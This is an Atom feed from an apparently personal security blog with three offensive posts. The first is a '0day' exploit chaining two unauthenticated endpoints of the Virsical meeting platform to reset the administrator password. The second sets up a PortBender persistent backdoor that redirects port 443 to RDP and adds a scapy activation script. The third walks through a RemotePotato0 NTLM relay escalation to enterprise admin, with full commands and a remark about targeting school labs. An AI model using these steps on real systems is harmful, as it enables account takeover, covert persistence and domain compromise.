<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">

  <title><![CDATA[R&T]]></title>
  <link href="https://Conanjun.github.io/atom.xml" rel="self"/>
  <link href="https://Conanjun.github.io/"/>
  <updated>2021-10-12T22:40:02+08:00</updated>
  <id>https://Conanjun.github.io/</id>
  <author>
    <name><![CDATA[]]></name>
    
  </author>
  <generator uri="http://www.mweb.im/">MWeb</generator>
  
  <entry>
    <title type="html"><![CDATA[virsical meeting platform 0day exploit]]></title>
    <link href="https://Conanjun.github.io/16340490317488.html"/>
    <updated>2021-10-12T22:30:31+08:00</updated>
    <id>https://Conanjun.github.io/16340490317488.html</id>
    <content type="html"><![CDATA[
<h2><a id="bug-description" class="anchor" aria-hidden="true" href="#bug-description"><span class="octicon octicon-link"></span></a>bug description</h2>
<p>two unauthorized interface combined exploit , leads to administrator account takeover</p>
<h2><a id="exploit-detail" class="anchor" aria-hidden="true" href="#exploit-detail"><span class="octicon octicon-link"></span></a>exploit detail</h2>
<ol>
<li>use unauthorized interface 1: <code>/smartmeeting/smart/third/deleteRoom?roomId=618</code> to get administrator name</li>
</ol>
<p><img src="media/16340490317488/16340490682344.jpg" alt="" /></p>
<ol start="2">
<li>use unauthorized interface 2: <code>/iwork/userInfo/updatePwd?userId=sysadmin&amp;pwd=xxxxxx</code> to update administrator's password(new pwd is base64 encoded)</li>
</ol>
<p><img src="media/16340490317488/16340493275275.jpg" alt="" /></p>
<ol start="3">
<li>successfully login to meeting manage panel with new password</li>
</ol>
<p><img src="media/16340490317488/16340495476625.jpg" alt="" /></p>

]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[使用 PortBender 实现 Duqu 2.0 持久化后门（NDIS 过滤器驱动程序 (PortServ.sys）]]></title>
    <link href="https://Conanjun.github.io/16303885700620.html"/>
    <updated>2021-08-31T13:42:50+08:00</updated>
    <id>https://Conanjun.github.io/16303885700620.html</id>
    <content type="html"><![CDATA[
<h2><a id="%E6%AD%A5%E9%AA%A4" class="anchor" aria-hidden="true" href="#%E6%AD%A5%E9%AA%A4"><span class="octicon octicon-link"></span></a>步骤</h2>
<ol>
<li>部署后门：将443端口的流量转发到3389端口</li>
</ol>
<pre><code>PortBender backdoor 443 3389 praetorian.antihacker
</code></pre>
<p><img src="media/16273819926394/16303101192616.jpg" alt="" /></p>
<ol start="2">
<li>activate.py 运行激活后门，其中src为运行连接的攻击者ip，dst为外网443端口机器的ip (再运行一次关闭后门)</li>
</ol>
<pre><code>import argparse
from scapy.all import *
TCP_ACTIVATE=TCP(dport=443, flags=&quot;SR&quot;, seq=100)
data = &quot;praetorian.antihacker&quot;
a = IP(dst=&quot;172.16.246.131&quot;, src=&quot;172.16.246.132&quot;)/TCP_ACTIVATE/data
send(a)
</code></pre>
<p><img src="media/16273819926394/16303100031367.jpg" alt="" /></p>
<p>复用80端口(iis服务)（当激活后门后iis服务失效，休眠后门后重新恢复）<br />
<img src="media/16303885700620/16303888757680.jpg" alt="" /></p>
<p><img src="media/16303885700620/16303889750141.jpg" alt="" /></p>
<h2><a id="%E5%8F%82%E8%80%83" class="anchor" aria-hidden="true" href="#%E5%8F%82%E8%80%83"><span class="octicon octicon-link"></span></a>参考</h2>
<p><a href="https://github.com/praetorian-inc/PortBender">PortBender</a><br />
<a href="https://www.praetorian.com/blog/portbender-utility/">How to redirect traffic from an incoming TCP port using the Portbender utility</a></p>

]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[RemotePotato]]></title>
    <link href="https://Conanjun.github.io/16298104512534.html"/>
    <updated>2021-08-24T21:07:31+08:00</updated>
    <id>https://Conanjun.github.io/16298104512534.html</id>
    <content type="html"><![CDATA[
<h4><a id="%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF" class="anchor" aria-hidden="true" href="#%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="octicon octicon-link"></span></a>利用场景</h4>
<pre><code>获取低权限用户权限shell+具有Domain Administrator特权的用户实际上已登录到同一主机或通过远程桌面登录（不需要有impersonation权限）

同一主机在线有点鸡肋，打学校机房可能是神器，老师远程查电脑就得中招
</code></pre>
<h4><a id="%E5%88%A9%E7%94%A8%E5%8E%9F%E7%90%86" class="anchor" aria-hidden="true" href="#%E5%88%A9%E7%94%A8%E5%8E%9F%E7%90%86"><span class="octicon octicon-link"></span></a>利用原理</h4>
<p><code>dcom trigger</code>（<code>IObjectExporter::ResolveOxid2 authenticated with ntlm sign set</code>+<code>IRemUnknown2::RemRelease authenticae with ntlm sign not set</code>）+<code>mitm</code>+ntlm跨协议中继（mitm需要域管在线同一个机器）<br />
<img src="media/16275463369813/16297392894034.jpg" alt="" /></p>
<p><img src="media/16275463369813/16297374291658.jpg" alt="" /></p>
<h4><a id="%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B" class="anchor" aria-hidden="true" href="#%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B"><span class="octicon octicon-link"></span></a>利用过程</h4>
<p><a href="https://github.com/antonioCoco/RemotePotato0">RemotePotato0</a></p>
<p>测试环境: 攻击机（win10_10.1.1.133+mac_10.1.1.1）-&gt; victim（win2012_10.1.1.132）</p>
<ol>
<li>
<p>adsecurity\administrator登录win2012的普通机器<br />
<img src="media/16275463369813/16298075712202.jpg" alt="" /></p>
</li>
<li>
<p>在win10上powershell winrm登录win2012,以普通域用户（zhangsan）的权限</p>
<pre><code>Set-Item WSMan:\localhost\Client\TrustedHosts -Value *
Enter-PSSession -ComputerName 10.1.1.132 -Authentication Negotiate -Credential $(get-credential)
</code></pre>
<p><img src="media/16275463369813/16298076720852.jpg" alt="" /></p>
</li>
<li>
<p>mac上开启ntlm中继</p>
</li>
</ol>
<pre><code>python ntlmrelayx.py -t ldap://10.1.1.128 --no-wcf-server --escalate-user zhangsan
</code></pre>
<p><img src="media/16298093922120/16298101495226.jpg" alt="" /></p>
<ol start="4">
<li>winrm执行RemotePotato0</li>
</ol>
<pre><code>.\RemotePotato0.exe -m 0 -r 10.1.1.1 -x 10.1.1.132 -p 9999 -s 1 -c &quot;{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}&quot; # win2012的cid在exp里没有，需要额外补充
</code></pre>
<p><img src="media/16275463369813/16298079548145.jpg" alt="" /></p>
<ol start="5">
<li>
<p>ntlm中继成功，zhangsan变为企业管理员权限<br />
<img src="media/16275463369813/16298079847555.jpg" alt="" /></p>
<p>psexec从无权限变为有权限</p>
<p><img src="media/16298093922120/16298102482306.jpg" alt="" /></p>
<p><img src="media/16275463369813/16298080591122.jpg" alt="" /></p>
</li>
</ol>
<h4><a id="%E5%8F%82%E8%80%83" class="anchor" aria-hidden="true" href="#%E5%8F%82%E8%80%83"><span class="octicon octicon-link"></span></a>参考</h4>
<p><a href="https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop/">relaying-potatoes-dce-rpc-ntlm-relay-eop</a><br />
<a href="https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/">Remote Potato – From Domain User to Enterprise Admin</a><br />
<a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/9b20084f-f673-4486-b81c-f6cdcc5edf84">OXID Resolution Request</a><br />
<a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/8235bff1-4811-4706-aaf8-b75bfc533de9">IRemUnknown Methods</a><br />
<a href="https://blog.csdn.net/weixin_51387754/article/details/116558137">Remote Potato–从域用户到企业管理员</a></p>

]]></content>
  </entry>
  
</feed>
